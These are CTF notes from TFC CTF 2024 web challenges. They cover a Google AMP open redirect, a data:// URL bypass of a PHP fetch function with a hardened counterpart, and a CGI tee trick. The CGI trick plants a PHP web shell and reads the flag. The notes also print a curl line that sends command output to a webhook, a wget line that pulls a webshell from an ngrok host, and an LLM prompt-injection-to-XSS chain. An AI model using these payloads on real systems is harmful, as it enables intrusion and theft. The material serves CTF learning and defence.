CTF Notes

Description

Tricks from CTF challenges and some lessons learned from them.

TFC CTF 2024

Web

SURFING

Google's AMP endpoint behaves as an open redirect, but it only redirects to HTTPS targets. By default, the following link redirects to https://example.com, not http://example.com.

http://google.com/amp/s/example.com

More tricks can be found in the Trustwave blog post below, where a # was used to bypass the .png suffix that gets appended to the URL:

Trusted Domain, Hidden Danger: Deceptive URL Redirections in Email Phishing Attacks (trustwave.com)

SAFE_CONTENT

The fetchContent function below passes the user-supplied URL straight to file_get_contents without restricting the scheme, so it can be bypassed with a data URL:

data://text@localhost/plain,<base64>

With curl, the -d @- argument reads the request body from stdin (standard input), so command output can be piped straight into a POST request:

id | base64 | curl -d @- https://webhook.site/<your_webhook_id>

function fetchContent($url) {
    $context = stream_context_create([
        'http' => [
            'timeout' => 5 // Timeout in seconds
        ]
    ]);

    $content = @file_get_contents($url, false, $context);
    if ($content === FALSE) {
        $error = error_get_last();
        throw new Exception("Unable to fetch content from the URL. Error: " . $error['message']);
    }
    return base64_decode($content);
}
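
As an added, defensive counterpart (this is not the challenge's code), here is a hardened version of that function that rejects the data:// payload above by allowlisting the scheme and refusing hosts that resolve to loopback, private or reserved addresses. The function names are mine, and it assumes a stock PHP 7+ install with the http stream wrapper enabled.

```php
<?php
// Added example, not from the challenge: reject anything that is not a plain
// http(s) URL to a public host before file_get_contents() ever sees it.
function assertFetchableUrl(string $url): void {
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        throw new InvalidArgumentException("Malformed URL");
    }
    // data://, file://, php://, gopher:// and friends are all refused here.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        throw new InvalidArgumentException("Scheme not allowed: " . $parts['scheme']);
    }
    // The payload above smuggles "text@localhost" as userinfo; credentials in a
    // fetch URL have no legitimate use, so refuse them outright.
    if (isset($parts['user']) || isset($parts['pass'])) {
        throw new InvalidArgumentException("Credentials in URL not allowed");
    }
    // Resolve the host (IPv4 only via gethostbyname) and refuse loopback,
    // link-local, private and reserved ranges. gethostbyname() returns the
    // unchanged hostname on failure, which filter_var() then rejects as well.
    // Caveat: DNS rebinding between this check and the fetch is not covered.
    $ip = gethostbyname($parts['host']);
    $ok = filter_var($ip, FILTER_VALIDATE_IP,
                     FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
    if ($ok === false) {
        throw new InvalidArgumentException("Host resolves to a disallowed address");
    }
}

function fetchContentHardened(string $url): string {
    assertFetchableUrl($url);
    $context = stream_context_create([
        'http' => [
            'timeout'         => 5,  // seconds
            'follow_location' => 0,  // a 30x could otherwise re-point us at localhost
        ],
    ]);
    $content = @file_get_contents($url, false, $context);
    if ($content === false) {
        $error = error_get_last();
        throw new RuntimeException("Unable to fetch content. Error: "
                                   . ($error['message'] ?? 'unknown'));
    }
    // Strict base64: fail on malformed input instead of decoding garbage.
    $decoded = base64_decode($content, true);
    if ($decoded === false) {
        throw new RuntimeException("Fetched content is not valid base64");
    }
    return $decoded;
}
```

Calling fetchContentHardened('data://text@localhost/plain,aGVsbG8=') throws "Scheme not allowed" before any I/O happens, and 'http://localhost/x' is refused at the address check.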

FUNNY

An HTTPD CGI-bin challenge: we had access to a few binaries exposed under cgi-bin and had to use them to get the flag. Our solution was to use tee to write the request body into a file under the web root and then request that file to get the flag.

GET /cgi-bin/tee?/var/www/public/test.php HTTP/1.1
Host: localhost:1337
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 34

<?php system($_GET["cmd"]); ?>

GET /test.php?cmd=cat%20/flag.txt HTTP/1.1
Host: localhost:1337
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 34

This works because of how HTTPD feeds the request body to a CGI program: for a POST request with data, the body is encoded and passed to STDIN, but for a GET request HTTPD reads Content-Length bytes and puts them into STDIN without any encoding. This GET-with-body trick is not documented; we discovered it through experimentation.

Apache Tutorial: Dynamic Content with CGI - Apache HTTP Server Version 2.4

Other payloads include:

curl http://challs.tfcctf.com:30472/cgi-bin/wget?https://9085-{REDACTED}.ngrok-free.app/webshell.php+-O+/var/www/public/webshell.php

The + symbol splits the query string into separate command-line arguments for the CGI binary (Apache does this when the query string contains no = character).

SAGIGRAM

Large Language Model (LLM) prompt injection to stored XSS, chained with CSP bypass.

default-src 'self' data:; script-src 'self' https://code.jquery.com/jquery-3.5.1.slim.min.js https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js; style-src 'self' 'unsafe-inline' https://stackpath.bootstrapcdn.com

https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass

We could use a data URI, or abuse the upload functionality, which only checks the first file extension. For example, upload a file named with the extension .png.js; an LLM reads the profile picture and writes its description into the alt attribute, so the description can be crafted to break out of the alt attribute and inject a script tag. Read the write-up for more details: https://siunam321.github.io/ctf/TFC-CTF-2024/Web/SAGIGRAM

ToDo

PNGIPHY

PHISHER

FLASK DESTROYER

TFC CTF 2024 Writeup | siunam’s Website (siunam321.github.io)